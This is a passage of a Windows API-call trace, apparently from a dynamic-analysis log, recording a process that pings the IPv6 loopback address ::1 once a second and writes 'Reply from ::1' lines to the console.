dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0134.804] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0134.804] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.804] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0134.808] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.808] LocalFree (hMem=0x4a51b8) returned 0x0 [0134.808] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0134.808] CharToOemBuffA (in: lpszSrc="time=5ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time=5ms ") returned 1 [0134.808] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.808] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0134.808] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.808] LocalFree (hMem=0x4a29e8) returned 0x0 [0134.809] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0134.809] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0134.809] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.809] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0134.809] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.809] LocalFree (hMem=0x4a8f68) returned 0x0 [0134.809] Sleep (dwMilliseconds=0x3e3) [0135.852] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0135.876] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0135.876] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0135.876] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0135.876] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.876] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0135.876] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.876] LocalFree (hMem=0x4a51b8) returned 0x0 [0135.876] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0135.877] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0135.877] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.877] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0135.877] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.877] LocalFree (hMem=0x4a29e8) returned 0x0 [0135.877] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0135.877] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0135.877] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.877] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0135.877] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.877] LocalFree (hMem=0x4a8f68) returned 0x0 [0135.877] Sleep (dwMilliseconds=0x3e8) [0136.899] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0137.002] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0137.002] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0137.003] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0137.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a51b8) returned 0x0 [0137.003] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0137.003] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0137.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a29e8) returned 0x0 [0137.003] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0137.003] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0137.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a8f68) returned 0x0 [0137.003] Sleep (dwMilliseconds=0x3e8) [0138.017] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0138.103] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0138.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0138.103] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0138.103] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.103] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0138.103] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.103] LocalFree (hMem=0x4a51b8) returned 0x0 [0138.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0138.103] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0138.103] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.103] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0138.104] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.104] LocalFree (hMem=0x4a29e8) returned 0x0 [0138.104] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0138.104] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0138.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.104] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0138.104] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.104] LocalFree (hMem=0x4a8f68) returned 0x0 [0138.104] Sleep (dwMilliseconds=0x3e8) [0139.173] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0139.247] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0139.247] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0139.247] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.247] LocalFree (hMem=0x4a51b8) returned 0x0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0139.247] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0139.247] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.247] LocalFree (hMem=0x4a29e8) returned 0x0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0139.247] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0139.248] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.248] LocalFree (hMem=0x4a8f68) returned 0x0 [0139.248] Sleep (dwMilliseconds=0x3e8) [0140.868] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0141.270] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0141.270] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0141.270] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0141.270] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.270] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0141.271] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.271] LocalFree (hMem=0x4a51b8) returned 0x0 [0141.271] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0141.271] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0141.271] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.272] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0141.272] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.272] LocalFree (hMem=0x4a29e8) returned 0x0 [0141.272] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0141.272] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0141.272] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.272] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0141.272] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.272] LocalFree (hMem=0x4a8f68) returned 0x0 [0141.272] Sleep (dwMilliseconds=0x3e8) [0142.469] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0142.803] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0142.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0142.803] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0142.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.803] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0142.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.803] LocalFree (hMem=0x4a51b8) returned 0x0 [0142.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0142.803] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0142.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.803] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0142.804] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.804] LocalFree (hMem=0x4a29e8) returned 0x0 [0142.804] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0142.804] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0142.804] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.804] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0142.804] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.804] LocalFree (hMem=0x4a8f68) returned 0x0 [0142.804] Sleep (dwMilliseconds=0x3e8) [0143.936] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0144.113] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0144.113] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0144.113] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0144.113] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.113] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] LocalFree (hMem=0x4a51b8) returned 0x0 [0144.114] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0144.114] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0144.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.114] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] LocalFree (hMem=0x4a29e8) returned 0x0 [0144.114] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0144.114] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0144.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.114] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] LocalFree (hMem=0x4a8f68) returned 0x0 [0144.114] Sleep (dwMilliseconds=0x3e8) [0145.194] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0145.304] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0145.304] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0145.304] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0145.304] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.304] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0145.304] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.304] LocalFree (hMem=0x4a51b8) returned 0x0 [0145.304] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0145.304] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0145.304] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.304] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0145.305] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.305] LocalFree (hMem=0x4a29e8) returned 0x0 [0145.305] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0145.305] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0145.305] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.305] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0145.305] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.305] LocalFree (hMem=0x4a8f68) returned 0x0 [0145.305] Sleep (dwMilliseconds=0x3e8) [0146.435] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0146.631] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0146.631] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0146.631] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0146.631] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.631] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0146.632] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.632] LocalFree (hMem=0x4a51b8) returned 0x0 [0146.632] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0146.632] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0146.632] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.632] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0146.632] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.632] LocalFree (hMem=0x4a29e8) returned 0x0 [0146.632] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0146.632] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0146.632] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.632] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0146.633] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.633] LocalFree (hMem=0x4a8f68) returned 0x0 [0146.633] Sleep (dwMilliseconds=0x3e8) [0147.710] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, 